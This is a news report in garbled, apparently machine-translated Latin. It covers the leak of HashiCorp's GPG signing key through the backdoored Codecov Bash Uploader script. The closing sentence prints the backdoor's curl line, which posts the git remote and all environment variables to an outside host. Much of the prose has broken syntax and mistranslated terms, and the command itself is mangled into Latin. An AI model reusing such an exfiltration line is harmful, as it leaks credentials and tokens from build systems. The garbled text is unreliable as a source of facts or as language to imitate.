HashiCorp, nota ad explicandum fontem apertum instrumenta Vagrantii, Packer, Nomad et Terraformi, denuntiavit Leak privatae GPG clavis adhibitis ad digitales signaturas creandas quae quin solutiones cognoscerent. Impugnatores qui accessum ad GPG clavem accesserunt, potentia occultas mutationes productorum HashiCorp facere potuerunt probando eas cum subscriptione digitali recta. Eodem tempore, societas affirmavit nulla vestigia temptationum quae in computo identificantur ut tales modificationes invenirentur.
In statu aedilis GPG clavem advocavit et nova clavis in eius locum introducta est. Problema tantum affectavit verificationem utentes SHA256SUM et SHA256SUM.sig imaginum, nec generationi signationum digitalium pro Linux DEB et RPM subministrarunt per emissiones.hashicorp.com, necnon emissio verificationis machinarum macOS et Windows (AuthentiCode) .
Leak obvenit ex usu scripturae in infrastructura (codecov-bash) onerati (codecov-bash) e continentibus systematis integrationis electronicarum relationum deprimendo destinato. In oppugnatione societatis Codecov, posticum in certum scriptum latebat, per quod claves et tesserae encryptiones oppugnatoribus ministranti missae sunt.
Ad hack, oppugnatores errorem in processu creandi Codecov Docker imaginis ceperunt, quibus accessum ad GCS datas (Google Cloud Storage), necesse est ut mutationes scriptionis Bash Uploadatoris ex codecov.io distributae. website. Mutationes rursus die 31 mensis Ianuarii factae inobservatae per duos menses manserunt et oppugnatoribus permiserunt ut informationes extrahendi in curriculis systematis integrationis continuae ambitus conservarentur. Utens malitiosa addita codice, oppugnatores habere potuerunt de probata reposito Git repositorium et omnes variabiles ambitus, inter signa, encryptiones clavium et Tesserae, ad systematum integrationem continuam transmittuntur ad accessum ad applicandum codicem, repositoria et officia disponendi sicut Services interretialem et GitHub .
Praeter vocationem directam, Codecov Bash Uploader scriptor usus est ut pars aliorum fasciculorum, ut Codecov-actio (Github), Codecov-circleci-orb et Codecov-bitrise-gradus, quorum utentes etiam problema afficiuntur. Omnes utentes codecov-bash et producta cognata commendantur ut infrastructuras suas audiant, ac tesserarum mutatio et claves encryption. Praesentia posticii in scripto a praesentia lineae crispi -sm 0.5 -d "$(git remota -v)<<<<<<ENV $(env)" http:// /upload/v2 || verum
Source: opennet.ru